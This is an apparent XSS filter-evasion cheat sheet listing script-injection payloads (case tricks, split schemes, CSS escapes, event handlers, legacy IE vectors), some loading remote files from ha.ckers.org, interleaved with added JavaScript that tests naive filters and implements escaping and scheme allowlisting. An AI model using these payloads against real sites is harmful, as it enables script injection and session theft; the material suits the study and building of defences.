1. Change the case of characters

<sCript>alert('d')</scRipT>

(HTML tag names are case-insensitive, so a case-sensitive match on "<script>" misses this.)
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

(A filter that pairs each "<" with the next ">" sees "<<script>" as a tag named "<script", and in the SCRIPT examples it stops at the ">" inside the quoted attribute value and never reaches SRC=. The browser ignores the stray "<" and reads the tag up to the ">" outside the quotes.)
3. Use another extension instead of .js

<script src="bad.jpg"></script>

(The extension is irrelevant to the browser; what matters is the Content-Type the server sends with the response.)
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}

(Only old Internet Explorer executed javascript: URLs from CSS.)
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

(The HTML tokenizer treats "/" like whitespace between the tag name and its attributes, so a filter that expects "<script " followed by a space misses these.)
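As an added example (it is not part of the original post), here is how the case, extra-character, extension and "/" tricks of sections 1, 2, 3 and 5 defeat three typical blocklist filters, and why encoding output for the HTML context works where pattern matching does not. The payloads are the ones quoted above; t.js and bad.jpg are the post's placeholder file names, and browserSeesScriptTag is a deliberately rough stand-in for the browser's tokenizer, not a real parser.

```javascript
// Added example, not from the original post. Three blocklist filters of
// increasing sophistication versus the payloads from sections 1, 2, 3 and 5,
// followed by the fix: contextual output encoding.

// Generation 1: literal, case-sensitive substring blocklist.
function literalBlocklist(html) {
  return html.includes('<script') ? '' : html;
}

// Generation 2: pair each "<" with the next ">" and drop the pair when the
// first word inside is "script" (case-folded). Many regex tag strippers
// work this way.
function pairedBracketFilter(html) {
  return html.replace(/<([^>]*)>/g, (match, inner) => {
    const name = inner.trim().split(/\s+/)[0].toLowerCase().replace(/^\//, '');
    return name === 'script' ? '' : match;
  });
}

// Generation 3: same pairing, but block any tag whose attributes reference
// a .js file. The pairing stops at the first ">" even inside a quoted
// attribute value, and the extension test is trivially wrong.
function jsSrcFilter(html) {
  return html.replace(/<([^>]*)>/g, (match, inner) =>
    /\bsrc\s*=\s*["']?[^"'\s>]*\.js\b/i.test(inner) ? '' : match);
}

// The fix: encode for the HTML text context instead of recognising bad
// markup. Nothing that comes out of this can open a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Rough model of what the browser's tokenizer will see: "<" followed by
// "script" and then whitespace, "/" or ">" opens a script element. Tag names
// are case-insensitive and "/" separates the name from attributes just as
// whitespace does; a "<" not followed by a letter is emitted as text.
function browserSeesScriptTag(html) {
  return /<script(?=[\s\/>])/i.test(html);
}

// Payloads from the post (constructed test data).
const payloads = {
  caseChange:     "<sCript>alert('d')</scRipT>",        // section 1
  extraBrackets:  "<<script>alert('c')//<</script>",    // section 2
  gtInAttribute:  '<SCRIPT a=">" SRC="t.js"></SCRIPT>', // section 2
  extensionSwap:  '<script src="bad.jpg"></script>',    // section 3
  slashSeparator: '<SCRIPT/SRC="t.js"></SCRIPT>',       // section 5
  plainJs:        '<script src="t.js"></script>',       // control
};

// For each filter, report which payloads still reach the browser as a
// script tag (true = the filter was bypassed).
function bypassReport() {
  const filters = { literal: literalBlocklist, paired: pairedBracketFilter, jsSrc: jsSrcFilter };
  const report = {};
  for (const [fname, filter] of Object.entries(filters)) {
    report[fname] = {};
    for (const [pname, payload] of Object.entries(payloads)) {
      report[fname][pname] = browserSeesScriptTag(filter(payload));
    }
  }
  return report;
}

// Output encoding leaves no payload able to open a tag.
function allInertAfterEncoding() {
  return Object.values(payloads).every((p) => !browserSeesScriptTag(escapeHtml(p)));
}

console.table(bypassReport());
console.log('all inert after escapeHtml:', allInertAfterEncoding());
```

Each generation closes one hole and leaves the next one open: the literal filter falls to case changes, the bracket-pairing filter to the extra "<" and to "/" in place of a space, and the src-scanning filter to a ">" inside the attribute value or a non-.js file name. Encoding the untrusted string for the context it is written into is the only approach in the block that does not depend on anticipating the next trick.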
6. Use a tab or newline to evade

<img src="jav ascr ipt:alert('XSS3')">   -> the gaps are tab characters

<img src="jav ascr ipt:alert('XSS3')">   -> the gaps are newline characters

<IMG SRC="jav ascript:alert('XSS');">

(The browser removes tab, LF and CR from a URL before it parses the scheme, so "javascript:" is reassembled. A plain space is not removed and does not work.)
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

(In CSS a backslash before a non-hex character is simply dropped, and /* */ comments are removed during tokenization, so "expre\ssi\on" and "expr/*anyword*/ession" both reach the engine as "expression". expression() was an Internet Explorer-only feature.)
8. Use hex encoding to evade (the ";" may also be dropped)

The hex-encoded forms were decoded when this post was copied, so each example appears here only as the markup it decodes to:

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
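The backslash, comment and hex tricks in sections 7 and 8 all rely on the CSS tokenizer undoing them before a property value is interpreted. As an added example (not from the original post), this normaliser applies the same rules a CSS engine does: /* */ comments are discarded (except inside string tokens), "\" plus one to six hex digits and one optional trailing whitespace character becomes that code point, and the backslash before any other character is dropped. A check for expression(, javascript: or @import then runs against what the engine would see. The payloads are the post's; the hex-escaped sample is my own construction, because the encoded form did not survive in this copy. The block ignores the backslash-newline line continuation, which a full tokenizer also handles.

```javascript
// Added example, not from the original post: normalise CSS the way the
// tokenizer does before looking for the dangerous constructs of sections
// 7 and 8.

// Remove /* */ comments, but not inside string tokens, where "/*" is
// ordinary text (the post's nested example depends on this).
function stripCssComments(css) {
  let out = '';
  let quote = null;
  for (let i = 0; i < css.length; i++) {
    const c = css[i];
    if (quote) {
      out += c;
      if (c === '\\' && i + 1 < css.length) out += css[++i]; // keep escaped char
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") {
      quote = c;
      out += c;
    } else if (c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      if (end === -1) break;           // unterminated comment eats the rest
      i = end + 1;
    } else {
      out += c;
    }
  }
  return out;
}

// Undo CSS escapes: "\" + 1..6 hex digits (+ one optional whitespace) is a
// code point; "\" before any other non-newline character yields that character.
function decodeCssEscapes(css) {
  return css.replace(
    /\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|([^\n\r\f]))/g,
    (_, hex, ch) => {
      if (hex === undefined) return ch;
      const cp = parseInt(hex, 16);
      // CSS maps NUL and out-of-range escapes to U+FFFD.
      return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    },
  );
}

function normalizeCss(css) {
  return decodeCssEscapes(stripCssComments(css));
}

// What to look for once the text is normalised. expression() and
// javascript: in url() were only honoured by old Internet Explorer, but a
// filter that must protect such clients has to look here, not at raw text.
const DANGEROUS_CSS = [
  { name: 'expression', re: /expression\s*\(/i },
  { name: 'javascript-url', re: /javascript\s*:/i },
  { name: 'import', re: /@import\b/i },
];

function findDangerousCss(css) {
  const normalized = normalizeCss(css);
  return DANGEROUS_CSS.filter(({ re }) => re.test(normalized)).map(({ name }) => name);
}

// Constructed samples: the post's payloads plus one hex-escaped spelling of
// "expression" (my own, since the encoded form did not survive in the copy).
const cssSamples = {
  backslashed: "xss:expre\\ssi\\on(alert('XSS31'))",
  commented:   "xss:expr/*anyword*/ession(alert('sss'))",
  nested:      'no\\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))',
  importJs:    "@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")';",
  hexEscaped:  'width: \\65 xpr\\65ssion(alert(1));',
  benign:      'width: 100px; background: url(/img/bg.png)',
};

function reportCss() {
  const out = {};
  for (const [name, css] of Object.entries(cssSamples)) {
    out[name] = { normalized: normalizeCss(css), flags: findDangerousCss(css) };
  }
  return out;
}

console.log(reportCss());
```

The string-aware comment stripping matters for the last payload in section 7: the "/*" inside "*//*" sits in a string token, so only the two comments after it are removed and "ex" + "pression" rejoin. A filter that strips comments with a plain regex would cut from the string's "/*" to the first "*/" and never see the word. Note that a hex escape is also recognised before letters a to f, so "\a" in a payload is U+000A, not a dropped backslash.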
9. Script in an HTML tag (event handler attributes)

<body onload="alert('onload')">

Any of these event-handler attributes can carry the script (many of them are Internet Explorer-specific): onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code, then reassemble it (XML data islands and DATASRC/DATAFLD binding are Internet Explorer features).

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

(The split "javas" + "cript" is joined only when the bound SPAN renders the island's content as HTML, so a filter that scans the raw page never sees "javascript:".)
12. Use HTML+TIME (Internet Explorer only).

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>

(The "to" value is entity-encoded so that it survives as an attribute; t:set assigns the decoded markup to innerHTML, and DEFER is what makes a script inserted that way run.)
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

(Current browsers ignore http-equiv="Set-Cookie".)
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(DYNSRC and LOWSRC are legacy Internet Explorer/Netscape attributes. Modern browsers still run javascript: URLs in <a href>, <iframe src>, <frame src> and <form action>, but no longer in <img src>, <table background>, <link href> or CSS url().)
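Sections 6 and 14 are the same problem from the filter's side: the scheme of a URL-valued attribute has to be recovered the way the browser recovers it, or the tab, newline, control-character and character-reference spellings of "javascript:" slip past a regex on the raw value. As an added example (not from the original post), this block decodes a subset of HTML character references, applies the URL Standard's pre-processing (trim leading and trailing C0 controls and space, delete tab, LF and CR everywhere), extracts the scheme and checks it against an allowlist. The sample attribute values are constructed; the ones with tabs and newlines are the post's, the others are the same payload written with references and a leading control byte.

```javascript
// Added example, not from the original post: reconstruct the scheme of a
// URL-valued attribute the way the browser does (sections 6 and 14), so
// that an allowlist check sees "javascript:" even when the payload hides it
// behind tabs, newlines, leading control characters or character references.

// Small subset of HTML character references: every numeric form (with or
// without the ";", which browsers tolerate) and a few named ones. A real
// implementation would use the full HTML5 entity table.
const NAMED_REFS = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", Tab: '\t', NewLine: '\n', colon: ':' };

function codePointToString(cp) {
  return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
}

function decodeHtmlAttribute(value) {
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => codePointToString(parseInt(h, 16)))
    .replace(/&#([0-9]+);?/g, (_, d) => codePointToString(parseInt(d, 10)))
    .replace(/&([A-Za-z]+);/g, (m, name) =>
      Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : m);
}

// URL Standard pre-processing: trim leading/trailing C0 controls and space,
// then delete every ASCII tab and newline (LF, CR) anywhere in the input.
// A plain space inside the scheme is NOT removed, which is why
// "jav ascript:" with a real space does nothing.
function normalizeUrl(attrValue) {
  return decodeHtmlAttribute(attrValue)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// Scheme = leading ASCII letter followed by letters, digits, "+", "-", ".",
// up to the first ":"; anything else is a relative reference (no scheme).
function urlScheme(url) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(url);
  return m ? m[1].toLowerCase() : null;
}

const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function checkUrlAttribute(attrValue) {
  const url = normalizeUrl(attrValue);
  const scheme = urlScheme(url);
  return { url, scheme, allowed: scheme === null || ALLOWED_SCHEMES.has(scheme) };
}

// The check these payloads were written to beat: a regex on the raw value.
function naiveJavascriptRegex(attrValue) {
  return /^\s*javascript:/i.test(attrValue);
}

// Constructed attribute values: the post's tab/newline tricks, plus the
// character-reference and control-character spellings of the same thing.
const urlSamples = [
  "jav\tascr\tipt:alert('XSS3')",   // section 6, tabs
  "jav\nascr\nipt:alert('XSS3')",   // section 6, newlines
  "jav&#x0A;ascript:alert('XSS')",  // encoded newline
  "&#106;avascript:alert('XSS')",   // decimal reference for "j"
  'javascript&colon;alert(1)',      // named reference for ":"
  '\u0001javascript:alert(1)',      // leading control character
  "javascript:alert('13')",         // section 14, plain
  'https://ha.ckers.org/xss.js',    // allowed absolute URL
  '/images/logo.png',               // relative: no scheme, allowed
];

function urlReport() {
  return urlSamples.map((raw) => ({
    raw,
    naiveCaught: naiveJavascriptRegex(raw),
    ...checkUrlAttribute(raw),
  }));
}

console.table(urlReport());
```

Run the allowlist on the normalised value at the moment the attribute is emitted, and reject anything whose scheme is not on the list rather than searching for "javascript". The order inside normalizeUrl matters: character references are decoded first because the HTML parser decodes them before the URL parser ever sees the value, and only then are the tab and newline characters removed.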